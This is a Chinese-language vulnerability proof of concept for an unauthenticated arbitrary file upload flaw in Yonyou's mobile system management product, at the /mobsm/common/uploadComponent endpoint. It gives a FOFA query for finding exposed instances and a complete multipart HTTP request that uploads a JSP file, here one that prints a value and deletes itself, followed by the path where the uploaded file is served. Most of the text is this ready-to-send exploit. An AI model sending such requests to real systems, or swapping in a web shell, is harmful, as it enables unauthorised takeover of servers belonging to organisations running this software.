用友移动系统管理uploadcomponent任意文件上传漏洞
一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadcomponent接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
二、影响版本
- 用友移动管理系统
三、资产测绘
- fofa:
app="用友-移动系统管理" - 登录页面
四、漏洞复现
POST /mobsm/common/uploadComponent HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_391
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 302
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.jsp"
<%out.print(111 * 111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--00content0boundary00
Content-Disposition: form-data; name="submit"
上传
--00content0boundary00--
上传文件位置
/mobsm/uploadComponent/stc.jsp